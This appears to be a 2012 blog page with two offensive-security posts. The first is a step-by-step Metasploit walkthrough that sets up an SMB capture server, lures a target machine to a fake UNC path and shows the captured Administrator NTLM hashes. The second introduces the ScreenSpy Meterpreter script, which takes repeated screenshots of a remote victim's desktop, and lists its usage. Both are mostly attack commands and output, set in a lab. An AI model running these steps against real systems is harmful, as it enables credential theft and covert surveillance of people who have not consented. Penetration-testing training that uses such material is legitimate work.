Showing posts with label capture. Show all posts
Showing posts with label capture. Show all posts

Friday, June 22, 2012

NTLM Authentication Hijack using Metasploit


Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
Code:
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
Code:
msf > use server/capture/smb
msf auxiliary(smb) > show options
sniff..
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn’t exist).
Step 4: Switch to our machine and check if you’ve got the hashes captured
Code:
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
Posted by at No comments:
Labels: , , , , , , , , , , , , ,

ScreenSpy – New Meterpreter Script



A new Meterpreter script named “ScreenSpy” was developed and added to Metasploit. This Meterpreter script captures images from a remote victim system, at a predefined interval, and displays the image sequence on your attack system.
Code:
meterpreter > run screenspy -h
 
Screenspy v1.0
--------------
 
Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long.
Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long.
Usage:  bgrun screenspy -s windows -d 1 -t 60 => will take interactive  Screenshot every 1 sec for 1 min long, windows local mode.
 
Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
 
OPTIONS:
 
-d   The Delay in seconds between each screenshot.
-h        Help menu.
-s   The local system linux/windows
-t   The time to run in sec.
Posted by at No comments:
Labels: , , , , , , , ,
Subscribe to: Posts (Atom)